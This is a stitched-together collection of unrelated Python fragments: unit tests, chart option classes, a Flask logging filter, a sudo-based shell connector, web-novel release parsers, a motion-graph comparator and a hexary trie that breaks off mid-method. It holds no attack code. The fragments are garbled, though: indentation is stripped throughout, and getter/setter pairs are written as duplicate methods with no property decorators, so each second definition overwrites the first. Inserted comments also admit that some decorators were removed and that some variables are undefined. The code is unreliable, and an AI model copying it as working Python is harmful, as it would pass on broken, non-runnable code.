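latents = sample_noise(size=(4, 4, 64, 64), offset_noise=0.1, generator=gen)
# size[:2] is (batch, channels); the trailing (1, 1) dims broadcast one offset
# value across every spatial position of each channel. |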
class TestDecisionId(TestCase):
def setUp(self) -> None:
pass
def test_str(self):
decision_id = DecisionId(DecisionTarget.ACTIVITY, 123)
s = str(decision_id)
self.assertIn(str(DecisionTarget.ACTIVITY), s)
self.assertIn('123', s)
def test_hash(self):
d1 = DecisionId(DecisionTarget.ACTIVITY, 123)
d2 = DecisionId(DecisionTarget.ACTIVITY, 123)
d3 = DecisionId(DecisionTarget.CHILD_WORKFLOW, 456)
self.assertEqual(hash(d1), hash(d2))
self.assertNotEqual(hash(d1), hash(d3))
def test_equal(self):
d1 = DecisionId(DecisionTarget.ACTIVITY, 123)
d2 = DecisionId(DecisionTarget.ACTIVITY, 123)
d3 = DecisionId(DecisionTarget.CHILD_WORKFLOW, 456)
self.assertTrue((d1 == d2))
self.assertFalse((d1 == d3))
def test_dictionary_key(self):
e = {}
d1 = DecisionId(DecisionTarget.ACTIVITY, 123)
d2 = DecisionId(DecisionTarget.CHILD_WORKFLOW, 456)
e[d1] = 'abc'
e[d2] = 'def'
self.assertEqual(e[d1], 'abc')
self.assertEqual(e[d2], 'def') |
@dataclass  # "@dataclass" assumed: the class body is bare field annotations with defaults
class MachineRequirements():
machine_type: str
keep_alive: int = FAL_SERVERLESS_DEFAULT_KEEP_ALIVE
base_image: (str | None) = None
exposed_port: (int | None) = None
scheduler: (str | None) = None
scheduler_options: (dict[(str, Any)] | None) = None
max_concurrency: (int | None) = None
max_multiplexing: (int | None) = None |
class OptionSeriesScatter3dLabel(Options):
def boxesToAvoid(self):
return self._config_get(None)
def boxesToAvoid(self, value: Any):
self._config(value, js_type=False)
def connectorAllowed(self):
return self._config_get(False)
def connectorAllowed(self, flag: bool):
self._config(flag, js_type=False)
def connectorNeighbourDistance(self):
return self._config_get(24)
def connectorNeighbourDistance(self, num: float):
self._config(num, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def format(self):
return self._config_get('undefined')
def format(self, text: str):
self._config(text, js_type=False)
def formatter(self):
return self._config_get('undefined')
def formatter(self, value: Any):
self._config(value, js_type=False)
def maxFontSize(self):
return self._config_get(None)
def maxFontSize(self, num: float):
self._config(num, js_type=False)
def minFontSize(self):
return self._config_get(None)
def minFontSize(self, num: float):
self._config(num, js_type=False)
def onArea(self):
return self._config_get(None)
def onArea(self, flag: bool):
self._config(flag, js_type=False)
def style(self) -> 'OptionSeriesScatter3dLabelStyle':
return self._config_sub_data('style', OptionSeriesScatter3dLabelStyle)
def useHTML(self):
return self._config_get(False)
def useHTML(self, flag: bool):
self._config(flag, js_type=False) |
class LESPeerRequestHandler(BasePeerRequestHandler):
async def handle_get_block_headers(self, peer: LESProxyPeer, cmd: commands.GetBlockHeaders) -> None:
self.logger.debug('Peer %s made header request: %s', peer, cmd)
headers = (await self.lookup_headers(cmd.payload.query))
self.logger.debug2('Replying to %s with %d headers', peer, len(headers))
peer.les_api.send_block_headers(headers, request_id=cmd.payload.request_id) |
def test_rollouts_from_python():
(env, agent) = (GymMazeEnv('CartPole-v0'), DummyCartPolePolicy())
sequential = SequentialRolloutRunner(n_episodes=2, max_episode_steps=2, deterministic=False, record_trajectory=False, record_event_logs=False, render=False)
sequential.maze_seeding = MazeSeeding(env_seed=1234, agent_seed=4321, cudnn_determinism_flag=False, explicit_env_seeds=None, explicit_agent_seeds=None, shuffle_seeds=False)
sequential.run_with(env=env, wrappers={}, agent=agent)
parallel = ParallelRolloutRunner(n_episodes=2, max_episode_steps=2, deterministic=False, record_trajectory=False, record_event_logs=False, n_processes=2)
parallel.maze_seeding = MazeSeeding(env_seed=1234, agent_seed=4321, cudnn_determinism_flag=False, explicit_env_seeds=None, explicit_agent_seeds=None, shuffle_seeds=False)
parallel.run_with(env=env, wrappers={MazeEnvMonitoringWrapper: {'observation_logging': True, 'action_logging': False, 'reward_logging': False}}, agent=agent) |
class ContextInjector(logging.Filter):
def filter(self, record):
current_process = ContextInjector.get_current_process()
current_hostname = socket.gethostname()
record.host = current_hostname
record.proc = current_process
record.pid = '-'
if (not isinstance(current_process, str)):
record.pid = current_process.pid
proc_name = current_process.name
if callable(proc_name):
proc_name = proc_name()
record.proc_name = proc_name
cmd_line = current_process.cmdline
if callable(cmd_line):
cmd_line = cmd_line()
record.command_line = ' '.join(cmd_line)
record.callstack = self.format_callstack()
record.url = '-'
record.args = '-'
record.form = '-'
record.username = '-'
try:
record.url = flask.request.url
except RuntimeError:
pass
try:
record.args = flask.request.args
except RuntimeError:
pass
try:
record.form = dict(flask.request.form)
if ('csrf_token' in record.form):
record.form['csrf_token'] = 'Was present, is cleaned up'
except RuntimeError:
pass
try:
record.username = f'{flask.g.user.id} -- {flask.g.user.email}'
except Exception:
pass
return True
    @staticmethod
    def format_callstack():
ind = 0
for (ind, frame) in enumerate((f[0] for f in inspect.stack())):
if ('__name__' not in frame.f_globals):
continue
modname = frame.f_globals['__name__'].split('.')[0]
if (modname != 'logging'):
break
        def _format_frame(frame):
            # frame is a traceback.FrameSummary with filename, lineno, name, line
            return f'  File "{frame.filename}", line {frame.lineno} in {frame.name}\n    {frame.line}'
stack = traceback.extract_stack()
stack = stack[:(- ind)]
return '\n'.join([_format_frame(frame) for frame in stack])
    @staticmethod
    def get_current_process():
mypid = os.getpid()
if (not psutil):
return f'Could not import psutil for {mypid!r}'
for proc in psutil.process_iter():
if (proc.pid == mypid):
return proc
raise ValueError(f'Could not find process {mypid!r}') |
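# Minimal sketch: attach the filter so every record carries the host/process
# fields set above. The logger name and format string are assumptions.
logger = logging.getLogger('app')
handler = logging.StreamHandler()
handler.addFilter(ContextInjector())
handler.setFormatter(logging.Formatter('%(host)s %(proc_name)s[%(pid)s]: %(message)s'))
logger.addHandler(handler) |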
def _verify_bucket(bucket, expected_name):
assert (bucket.name == expected_name)
file_name = 'data_{0}.txt'.format(int(time.time()))
blob = bucket.blob(file_name)
blob.upload_from_string('Hello World')
blob = bucket.get_blob(file_name)
assert (blob.download_as_string().decode() == 'Hello World')
bucket.delete_blob(file_name)
assert (not bucket.get_blob(file_name)) |
def test_medium_interp():
coord_interp = td.Coords(**{ax: np.linspace((- 2), 2, (20 + ind)) for (ind, ax) in enumerate('xyz')})
orig_data = make_scalar_data()
data_fit_nearest = coord_interp.spatial_interp(orig_data, 'nearest')
data_fit_linear = coord_interp.spatial_interp(orig_data, 'linear')
assert np.allclose(data_fit_nearest.shape[:3], [len(f) for f in coord_interp.to_list])
assert np.allclose(data_fit_linear.shape[:3], [len(f) for f in coord_interp.to_list])
assert (max(data_fit_linear.values.ravel()) <= max(orig_data.values.ravel()))
assert (min(data_fit_linear.values.ravel()) >= min(orig_data.values.ravel()))
assert (max(data_fit_nearest.values.ravel()) <= max(orig_data.values.ravel()))
assert (min(data_fit_nearest.values.ravel()) >= min(orig_data.values.ravel()))
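    # NOTE: Ny, Nz, Y, Z and freqs below are module-level fixtures of the
    # original test file; they are not defined in this snippet.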
Nx = 1
X = [1.1]
data = np.random.random((Nx, Ny, Nz, 1))
orig_data = td.ScalarFieldDataArray(data, coords=dict(x=X, y=Y, z=Z, f=freqs))
data_fit_nearest = coord_interp.spatial_interp(orig_data, 'nearest')
data_fit_linear = coord_interp.spatial_interp(orig_data, 'linear')
assert np.allclose(data_fit_nearest.shape[:3], [len(f) for f in coord_interp.to_list])
assert np.allclose(data_fit_linear.shape[:3], [len(f) for f in coord_interp.to_list])
assert (max(data_fit_linear.values.ravel()) <= max(orig_data.values.ravel()))
assert (min(data_fit_linear.values.ravel()) >= min(orig_data.values.ravel()))
assert (max(data_fit_nearest.values.ravel()) <= max(orig_data.values.ravel()))
assert (min(data_fit_nearest.values.ravel()) >= min(orig_data.values.ravel()))
assert (not np.allclose(orig_data.shape[:3], [len(f) for f in coord_interp.to_list])) |
class LocalShellConnector(Connector):
def execute(self, cmd, root=False):
if ((not root) and (os.geteuid() == 0)):
return execute_subprocess((['sudo', '-u', tools_user()[1]] + cmd))
if root:
cmd = (['sudo', '-n'] + cmd)
return execute_subprocess(cmd)
def push(self, src, dst):
(ret, stdout, stderr) = execute_subprocess(['cp', '-rf', src, dst])
if (ret != 0):
raise XVEx("Couldn't copy {} -> {}: stdout: {}, stderr: {}".format(src, dst, stdout, stderr))
if (os.geteuid() != 0):
return
L.verbose('Removing root permissions from file {} ({})'.format(dst, tools_user()[0]))
os.chown(dst, tools_user()[0], (- 1))
def pull(self, src, dst):
self.push(src, dst) |
def extractSporadicsporesBlogspotCom(item):
if ('Songs' in item['tags']):
return None
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Chairman Husband Too Boorish', 'Chairman Husband Too Boorish', 'translated'), ('Heartbeat at the Tip of the Tongue', 'Heartbeat at the Tip of the Tongue', 'translated'), ('Love O2O', 'Love O2O', 'translated'), ('Heart Protection', 'Heart Protection', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
@pytest.mark.parametrize('custom_fields_dict, expected_custom_fields', [({}, {'minSuccessRatio': 1.0}), ({'concurrency': 99}, {'parallelism': '99', 'minSuccessRatio': 1.0}), ({'min_success_ratio': 0.271828}, {'minSuccessRatio': 0.271828}), ({'concurrency': 42, 'min_success_ratio': 0.31415}, {'parallelism': '42', 'minSuccessRatio': 0.31415})])
def test_serialization_of_custom_fields(custom_fields_dict, expected_custom_fields, serialization_settings):
maptask = map_task(t1, **custom_fields_dict)
task_spec = get_serializable(OrderedDict(), serialization_settings, maptask)
assert (task_spec.template.custom == expected_custom_fields) |
class OptionPlotoptionsBarSonificationTracksMappingVolume(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class GaussianTanhTransformedHead():
mean: jnp.ndarray
log_std: jnp.ndarray
def sample(self, seed):
return reparameterize_gaussian_and_tanh(self.mean, self.log_std, seed, return_log_pi=False)
def sample_and_log_prob(self, key):
return reparameterize_gaussian_and_tanh(self.mean, self.log_std, key, return_log_pi=True)
def mode(self):
return jnp.tanh(self.mean) |
class Collection(Filter):
filters = List(Instance(PipelineBase), record=True)
_pipeline_ready = Bool(False)
def __set_pure_state__(self, state):
handle_children_state(self.filters, state.filters)
super(Collection, self).__set_pure_state__(state)
def default_traits_view(self):
le = ListEditor(use_notebook=True, deletable=False, export='DockWindowShell', page_name='.name')
view = View(Group(Item(name='filters', style='custom', show_label=False, editor=le, resizable=True), show_labels=False), resizable=True)
return view
def setup_pipeline(self):
if ((len(self.filters) > 0) and (not self._pipeline_ready)):
self._filters_changed([], self.filters)
def stop(self):
super(Collection, self).stop()
for filter in self.filters:
filter.stop()
def update_pipeline(self):
self._setup_pipeline()
self.pipeline_changed = True
def update_data(self):
self.data_changed = True
def _setup_pipeline(self):
if ((len(self.inputs) == 0) or (len(self.filters) == 0)):
return
my_input = self.inputs[0]
filters = self.filters
if (not self._pipeline_ready):
first = self.filters[0]
first.inputs = [my_input]
for i in range(1, len(filters)):
filter = filters[i]
filter.inputs = [filters[(i - 1)]]
self._pipeline_ready = True
for filter in filters:
filter.start()
last = filters[(- 1)]
self._set_outputs(last.outputs)
def _filters_changed(self, old, new):
self._handle_filters_changed(old, new)
def _filters_items_changed(self, list_event):
self._handle_filters_changed(list_event.removed, list_event.added)
def _scene_changed(self, old, new):
for filter in self.filters:
filter.scene = new
super(Collection, self)._scene_changed(old, new)
def _handle_filters_changed(self, removed, added):
for filter in removed:
self._setup_events(filter, remove=True)
filter.stop()
for filter in added:
if (self.scene is not None):
filter.scene = self.scene
if (len(filter.name) == 0):
filter.name = filter.__class__.__name__
if (filter is self.filters[(- 1)]):
self._setup_events(filter)
self._pipeline_ready = False
self._setup_pipeline()
def _fire_pipeline_changed(self):
self._set_outputs(self.filters[(- 1)].outputs)
def _setup_events(self, obj, remove=False):
obj.on_trait_change(self.update_data, 'data_changed', remove=remove)
obj.on_trait_change(self._fire_pipeline_changed, 'pipeline_changed', remove=remove)
def _visible_changed(self, value):
for filter in self.filters:
filter.visible = value
super(Collection, self)._visible_changed(value)
def _recorder_changed(self, old, new):
super(Collection, self)._recorder_changed(old, new)
for filter in self.filters:
filter.recorder = new |
def extractYuNSTranslations(item):
if ('(Manga)' in item['title']):
return None
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol or frag)) or ('preview' in item['title'].lower())):
return None
titlemap = [('Akashic Records of the Bastard Magical Instructor', 'Akashic Records of the Bastard Magical Instructor', 'translated'), ('Akashic Records of the Bastard Magic Instructor', 'Akashic Records of the Bastard Magical Instructor', 'translated'), ('Gifting this Wonderful World with Blessings!', 'Gifting this Wonderful World with Blessings!', 'translated'), ('Gifting this Wonderful Worlds with Explosions!', 'Gifting this Wonderful Worlds with Explosions!', 'translated'), ('I Shaved. Then I Brought a High School Girl Home', 'I Shaved. Then I Brought a High School Girl Home', 'translated')]
for (titlecomponent, name, tl_type) in titlemap:
if (titlecomponent.lower() in item['title'].lower()):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class OptionSeriesScatter3dAccessibilityPoint(Options):
def dateFormat(self):
return self._config_get(None)
def dateFormat(self, text: str):
self._config(text, js_type=False)
def dateFormatter(self):
return self._config_get(None)
def dateFormatter(self, value: Any):
self._config(value, js_type=False)
def describeNull(self):
return self._config_get(True)
def describeNull(self, flag: bool):
self._config(flag, js_type=False)
def descriptionFormat(self):
return self._config_get(None)
def descriptionFormat(self, text: str):
self._config(text, js_type=False)
def descriptionFormatter(self):
return self._config_get(None)
def descriptionFormatter(self, value: Any):
self._config(value, js_type=False)
def valueDecimals(self):
return self._config_get(None)
def valueDecimals(self, num: float):
self._config(num, js_type=False)
def valueDescriptionFormat(self):
return self._config_get('{xDescription}{separator}{value}.')
def valueDescriptionFormat(self, text: str):
self._config(text, js_type=False)
def valuePrefix(self):
return self._config_get(None)
def valuePrefix(self, text: str):
self._config(text, js_type=False)
def valueSuffix(self):
return self._config_get(None)
def valueSuffix(self, text: str):
self._config(text, js_type=False) |
def compare_and_connect_edge(node_id, nodes, motions, frames_compare, w_joints, w_joint_pos, w_joint_vel, w_root_pos, w_root_vel, w_ee_pos, w_ee_vel, w_trajectory, diff_threshold, num_comparison, verbose):
node = nodes[node_id]
res = []
num_nodes = len(nodes)
motion_idx = node['motion_idx']
frame_end = node['frame_end']
for j in range(num_nodes):
motion_idx_j = nodes[j]['motion_idx']
frame_start_j = nodes[j]['frame_start']
diff_pose = 0.0
diff_root_ee = 0.0
diff_trajectory = 0.0
for k in range(0, (frames_compare + 1), ((frames_compare + 1) // num_comparison)):
pose = motions[motion_idx].get_pose_by_frame((frame_end + k))
vel = motions[motion_idx].get_velocity_by_frame((frame_end + k))
pose_j = motions[motion_idx_j].get_pose_by_frame((frame_start_j + k))
vel_j = motions[motion_idx_j].get_velocity_by_frame((frame_start_j + k))
if (k == 0):
T_ref = pose.get_facing_transform()
T_ref_j = pose_j.get_facing_transform()
diff_pose += similarity.pose_similarity(pose, pose_j, vel, vel_j, w_joint_pos, w_joint_vel, w_joints)
diff_root_ee += similarity.root_ee_similarity(pose, pose_j, vel, vel_j, w_root_pos, w_root_vel, w_ee_pos, w_ee_vel, T_ref, T_ref_j)
if (w_trajectory > 0.0):
(R, p) = conversions.T2Rp(pose.get_facing_transform())
(R_j, p_j) = conversions.T2Rp(pose_j.get_facing_transform())
if (k > 0):
d = np.dot(R_prev.transpose(), (p - p_prev))
d_j = np.dot(R_j_prev.transpose(), (p_j - p_j_prev))
d = (d - d_j)
diff_trajectory += np.dot(d, d)
(R_prev, p_prev) = (R, p)
(R_j_prev, p_j_prev) = (R_j, p_j)
diff_pose /= num_comparison
diff_root_ee /= num_comparison
diff_trajectory /= num_comparison
diff = ((diff_pose + diff_root_ee) + diff_trajectory)
if (diff <= diff_threshold):
res.append((diff, node_id, j))
return res |
class HexaryTrie():
__slots__ = ('db', 'root_hash', 'is_pruning', '_ref_count', '_pending_prune_keys')
BLANK_NODE_HASH = BLANK_NODE_HASH
BLANK_NODE = BLANK_NODE
def __init__(self, db, root_hash=BLANK_NODE_HASH, prune=False, ref_count=None):
self.db = db
validate_is_bytes(root_hash)
self.root_hash = root_hash
self.is_pruning = prune
if (ref_count is None):
if prune:
self._ref_count = defaultdict(int)
else:
self._ref_count = None
elif prune:
self._ref_count = ref_count
else:
raise ValueError('Cannot pass an existing reference count in to a non-pruning trie')
self._pending_prune_keys = None
def get(self, key):
validate_is_bytes(key)
trie_key = bytes_to_nibbles(key)
root_hash = self.root_hash
try:
return self._get(root_hash, trie_key)
except MissingTraversalNode as traverse_exc:
raise MissingTrieNode(traverse_exc.missing_node_hash, root_hash, key, traverse_exc.nibbles_traversed) from traverse_exc
def _get(self, root_hash, trie_key):
(node, remaining_key) = self._traverse(root_hash, trie_key)
node_type = get_node_type(node)
if (node_type == NODE_TYPE_BLANK):
return BLANK_NODE
elif (node_type == NODE_TYPE_LEAF):
if (remaining_key == extract_key(node)):
return node[1]
else:
return BLANK_NODE
elif (node_type == NODE_TYPE_EXTENSION):
if (len(remaining_key) > 0):
raise ValidationError(f'Traverse should never return an extension node with remaining key, but returned node {node!r} with remaining key {remaining_key}.')
else:
return BLANK_NODE
elif (node_type == NODE_TYPE_BRANCH):
if (len(remaining_key) > 0):
raise ValidationError(f'Traverse should never return a non-empty branch node with remaining key, but returned node {node!r} with remaining key {remaining_key}.')
else:
return node[(- 1)]
else:
raise Exception("Invariant: This shouldn't ever happen")
def traverse(self, trie_key_input: NibblesInput) -> HexaryTrieNode:
trie_key = Nibbles(trie_key_input)
(node, remaining_key) = self._traverse(self.root_hash, trie_key)
annotated_node = annotate_node(node)
if remaining_key:
path_to_node = trie_key[:(len(trie_key) - len(remaining_key))]
raise TraversedPartialPath(path_to_node, annotated_node, remaining_key)
else:
return annotated_node
def _traverse(self, root_hash, trie_key) -> Tuple[(RawHexaryNode, Nibbles)]:
try:
root_node = self.get_node(root_hash)
except KeyError:
raise MissingTraversalNode(root_hash, ())
return self._traverse_from(root_node, trie_key)
def traverse_from(self, parent_node: HexaryTrieNode, trie_key_input: Nibbles) -> HexaryTrieNode:
trie_key = Nibbles(trie_key_input)
(node, remaining_key) = self._traverse_from(parent_node.raw, trie_key)
annotated_node = annotate_node(node)
if remaining_key:
path_to_node = trie_key[:(len(trie_key) - len(remaining_key))]
raise TraversedPartialPath(path_to_node, annotated_node, remaining_key)
else:
return annotated_node
def _traverse_from(self, node: RawHexaryNode, trie_key) -> Tuple[(RawHexaryNode, Nibbles)]:
remaining_key = trie_key
while remaining_key:
node_type = get_node_type(node)
if (node_type == NODE_TYPE_BLANK):
return (BLANK_NODE, ())
elif (node_type == NODE_TYPE_LEAF):
leaf_key = extract_key(node)
if key_starts_with(leaf_key, remaining_key):
return (node, remaining_key)
else:
return (BLANK_NODE, ())
elif (node_type == NODE_TYPE_EXTENSION):
try:
(next_node_pointer, remaining_key) = self._traverse_extension(node, remaining_key)
except _PartialTraversal:
return (node, remaining_key)
elif (node_type == NODE_TYPE_BRANCH):
next_node_pointer = node[remaining_key[0]]
remaining_key = remaining_key[1:]
else:
raise Exception("Invariant: This shouldn't ever happen")
try:
node = self.get_node(next_node_pointer)
except KeyError as exc:
used_key = trie_key[:(len(trie_key) - len(remaining_key))]
raise MissingTraversalNode(exc.args[0], used_key)
return (node, Nibbles(()))
def _traverse_extension(self, node, trie_key):
current_key = extract_key(node)
(common_prefix, current_key_remainder, trie_key_remainder) = consume_common_prefix(current_key, trie_key)
if (len(current_key_remainder) == 0):
return (node[1], trie_key_remainder)
elif (len(trie_key_remainder) == 0):
raise _PartialTraversal
else:
return (BLANK_NODE, ())
def _raise_missing_node(self, exception, key):
raise MissingTrieNode(exception.args[0], self.root_hash, key, prefix=None) from exception
    # The decorator that wrapped set()/delete() was stripped from this source
    # (only a "_pending" residue survived); its effect is restored explicitly by
    # running the update inside the _prune_on_success() pruning context.
    def set(self, key, value):
        validate_is_bytes(key)
        validate_is_bytes(value)
        trie_key = bytes_to_nibbles(key)
        with self._prune_on_success():
            try:
                root_node = self.get_node(self.root_hash)
                if (value == b''):
                    new_node = self._delete(root_node, trie_key)
                else:
                    new_node = self._set(root_node, trie_key, value)
            except KeyError as exc:
                self._raise_missing_node(exc, key)
            self._set_root_node(new_node)
def _set(self, node, trie_key, value):
node_type = get_node_type(node)
self._prune_node(node)
if (node_type == NODE_TYPE_BLANK):
return [compute_leaf_key(trie_key), value]
elif (node_type in {NODE_TYPE_LEAF, NODE_TYPE_EXTENSION}):
return self._set_kv_node(node, trie_key, value)
elif (node_type == NODE_TYPE_BRANCH):
return self._set_branch_node(node, trie_key, value)
else:
raise Exception("Invariant: This shouldn't ever happen")
def exists(self, key):
validate_is_bytes(key)
return (self.get(key) != BLANK_NODE)
    # pruning context restored explicitly, as in set() above
    def delete(self, key):
        validate_is_bytes(key)
        trie_key = bytes_to_nibbles(key)
        with self._prune_on_success():
            try:
                root_node = self.get_node(self.root_hash)
                new_node = self._delete(root_node, trie_key)
            except KeyError as exc:
                self._raise_missing_node(exc, key)
            self._set_root_node(new_node)
def _delete(self, node, trie_key):
node_type = get_node_type(node)
self._prune_node(node)
if (node_type == NODE_TYPE_BLANK):
return BLANK_NODE
elif (node_type in {NODE_TYPE_LEAF, NODE_TYPE_EXTENSION}):
return self._delete_kv_node(node, trie_key)
elif (node_type == NODE_TYPE_BRANCH):
return self._delete_branch_node(node, trie_key)
else:
raise Exception("Invariant: This shouldn't ever happen")
    @property
    def ref_count(self):
if (self._ref_count is None):
raise Exception('Trie does not track node usage unless pruning is enabled')
else:
return self._ref_count
    @classmethod
    def get_from_proof(cls, root_hash, key, proof):
trie = cls({})
for node in proof:
trie._set_raw_node(node)
with trie.at_root(root_hash) as proven_snapshot:
try:
return proven_snapshot.get(key)
except MissingTrieNode as e:
raise BadTrieProof(f'Missing proof node with hash {e.missing_node_hash}')
def get_proof(self, key):
validate_is_bytes(key)
node = self.get_node(self.root_hash)
trie_key = bytes_to_nibbles(key)
return self._get_proof(node, trie_key)
def _get_proof(self, node, trie_key, proven_len=0, last_proof=tuple()):
updated_proof = (last_proof + (node,))
unproven_key = trie_key[proven_len:]
node_type = get_node_type(node)
if (node_type == NODE_TYPE_BLANK):
return last_proof
elif (node_type == NODE_TYPE_LEAF):
return updated_proof
elif (node_type == NODE_TYPE_EXTENSION):
current_key = extract_key(node)
if key_starts_with(unproven_key, current_key):
next_node = self.get_node(node[1])
new_proven_len = (proven_len + len(current_key))
return self._get_proof(next_node, trie_key, new_proven_len, updated_proof)
else:
return updated_proof
elif (node_type == NODE_TYPE_BRANCH):
if (not unproven_key):
return updated_proof
next_node = self.get_node(node[unproven_key[0]])
new_proven_len = (proven_len + 1)
return self._get_proof(next_node, trie_key, new_proven_len, updated_proof)
else:
raise Exception("Invariant: This shouldn't ever happen")
    @property
    def root_node(self) -> HexaryTrieNode:
try:
raw_node = self.get_node(self.root_hash)
except KeyError:
raise MissingTraversalNode(self.root_hash, nibbles_traversed=())
else:
return annotate_node(raw_node)
    @contextmanager
    def _prune_on_success(self):
if self.is_pruning:
if (self._pending_prune_keys is None):
self._pending_prune_keys = defaultdict(int)
else:
raise ValidationError('Cannot set/delete simultaneously, run them in serial')
try:
(yield)
if self.is_pruning:
self._complete_pruning()
finally:
self._pending_prune_keys = None
def _prune_node(self, node):
if self.is_pruning:
(prune_key, node_body) = self._node_to_db_mapping(node)
if (node_body is not None):
self._pending_prune_keys[prune_key] += 1
def _complete_pruning(self):
for (key, number_prunes) in self._pending_prune_keys.items():
new_count = (self._ref_count[key] - number_prunes)
if (new_count <= 0):
try:
del self.db[key]
except KeyError as exc:
raise ValidationError(("Tried to prune key %r that doesn't exist" % key)) from exc
else:
new_count = 0
if (new_count == 0):
del self._ref_count[key]
else:
self._ref_count[key] = new_count
def regenerate_ref_count(self):
new_ref_count = defaultdict(int)
keys_to_count = [self.root_hash]
while keys_to_count:
key = keys_to_count.pop()
if ((key == b'') or isinstance(key, list) or (key == BLANK_NODE_HASH)):
continue
new_ref_count[key] += 1
node = self.get_node(key)
node_type = get_node_type(node)
if (node_type == NODE_TYPE_BLANK):
continue
if (node_type == NODE_TYPE_BRANCH):
keys_to_count.extend(node[:16])
elif (node_type == NODE_TYPE_EXTENSION):
keys_to_count.append(node[1])
return new_ref_count
def _set_raw_node(self, raw_node):
(key, value) = self._node_to_db_mapping(raw_node)
if (key == BLANK_NODE):
return BLANK_NODE_HASH
if (value is None):
encoded_node = encode_raw(key)
node_hash = keccak(encoded_node)
else:
encoded_node = value
node_hash = key
self._set_db_value(node_hash, encoded_node)
return node_hash
def _set_db_value(self, key, value):
self.db[key] = value
if self.is_pruning:
self._ref_count[key] += 1
def _set_root_node(self, root_node):
validate_is_node(root_node)
if self.is_pruning:
old_root_hash = self.root_hash
if (old_root_hash != BLANK_NODE_HASH):
try:
old_root_node = self.get_node(old_root_hash)
except KeyError:
pass
else:
(prune_key, node_body) = self._node_to_db_mapping(old_root_node)
if ((node_body is None) and (old_root_hash in self.db)):
self._pending_prune_keys[old_root_hash] += 1
self.root_hash = self._set_raw_node(root_node)
def get_node(self, node_hash):
if (node_hash == BLANK_NODE):
return BLANK_NODE
elif (node_hash == BLANK_NODE_HASH):
return BLANK_NODE
if (len(node_hash) < 32):
encoded_node = node_hash
else:
encoded_node = self.db[node_hash]
node = decode_node(encoded_node)
return node
def _node_to_db_mapping(self, node):
if (self.is_pruning and isinstance(node, list)):
return self._cached_create_node_to_db_mapping(tuplify(node))
else:
return self._create_node_to_db_mapping(node)
    @lru_cache(4096)
def _cached_create_node_to_db_mapping(self, node):
if isinstance(node, tuple):
node = listify(node)
return self._create_node_to_db_mapping(node)
def _create_node_to_db_mapping(self, node):
validate_is_node(node)
if is_blank_node(node):
return (BLANK_NODE, None)
encoded_node = encode_raw(node)
if (len(encoded_node) < 32):
return (node, None)
encoded_node_hash = keccak(encoded_node)
return (encoded_node_hash, encoded_node)
def _persist_node(self, node):
(key, value) = self._node_to_db_mapping(node)
if (value is not None):
self._set_db_value(key, value)
return key
def _normalize_branch_node(self, node):
iter_node = iter(node)
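        # Consuming the same iterator twice checks that at least two entries
        # are non-blank; if so, the branch node is still needed and is
        # returned unchanged.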
if (any(iter_node) and any(iter_node)):
return node
if node[(- 1)]:
return [compute_leaf_key([]), node[(- 1)]]
(sub_node_idx, sub_node_hash) = next(((idx, v) for (idx, v) in enumerate(node[:16]) if v))
sub_node = self.get_node(sub_node_hash)
sub_node_type = get_node_type(sub_node)
if (sub_node_type in {NODE_TYPE_LEAF, NODE_TYPE_EXTENSION}):
self._prune_node(sub_node)
new_subnode_key = encode_nibbles(tuple(itertools.chain([sub_node_idx], decode_nibbles(sub_node[0]))))
return [new_subnode_key, sub_node[1]]
elif (sub_node_type == NODE_TYPE_BRANCH):
return [encode_nibbles([sub_node_idx]), sub_node_hash]
else:
raise Exception('Invariant: this code block should be unreachable')
def _delete_branch_node(self, node, trie_key):
if (not trie_key):
node[(- 1)] = BLANK_NODE
return self._normalize_branch_node(node)
node_to_delete = self.get_node(node[trie_key[0]])
sub_node = self._delete(node_to_delete, trie_key[1:])
encoded_sub_node = self._persist_node(sub_node)
if (encoded_sub_node == node[trie_key[0]]):
return node
node[trie_key[0]] = encoded_sub_node
if (encoded_sub_node == BLANK_NODE):
return self._normalize_branch_node(node)
return node
def _delete_kv_node(self, node, trie_key):
current_key = extract_key(node)
if (not key_starts_with(trie_key, current_key)):
return node
node_type = get_node_type(node)
if (node_type == NODE_TYPE_LEAF):
if (trie_key == current_key):
return BLANK_NODE
else:
return node
sub_node_key = trie_key[len(current_key):]
sub_node = self.get_node(node[1])
new_sub_node = self._delete(sub_node, sub_node_key)
encoded_new_sub_node = self._persist_node(new_sub_node)
if (encoded_new_sub_node == node[1]):
return node
if (new_sub_node == BLANK_NODE):
return BLANK_NODE
new_sub_node_type = get_node_type(new_sub_node)
if (new_sub_node_type in {NODE_TYPE_LEAF, NODE_TYPE_EXTENSION}):
self._prune_node(new_sub_node)
new_key = (current_key + decode_nibbles(new_sub_node[0]))
return [encode_nibbles(new_key), new_sub_node[1]]
if (new_sub_node_type == NODE_TYPE_BRANCH):
return [encode_nibbles(current_key), encoded_new_sub_node]
raise Exception('Invariant, this code path should not be reachable')
def _set_branch_node(self, node, trie_key, value):
if trie_key:
sub_node = self.get_node(node[trie_key[0]])
new_node = self._set(sub_node, trie_key[1:], value)
node[trie_key[0]] = self._persist_node(new_node)
else:
node[(- 1)] = value
return node
def _set_kv_node(self, node, trie_key, value):
current_key = extract_key(node)
(common_prefix, current_key_remainder, trie_key_remainder) = consume_common_prefix(current_key, trie_key)
is_extension = is_extension_node(node)
if ((not current_key_remainder) and (not trie_key_remainder)):
if is_leaf_node(node):
return [node[0], value]
else:
sub_node = self.get_node(node[1])
new_node = self._set(sub_node, trie_key_remainder, value)
elif (not current_key_remainder):
if is_extension:
sub_node = self.get_node(node[1])
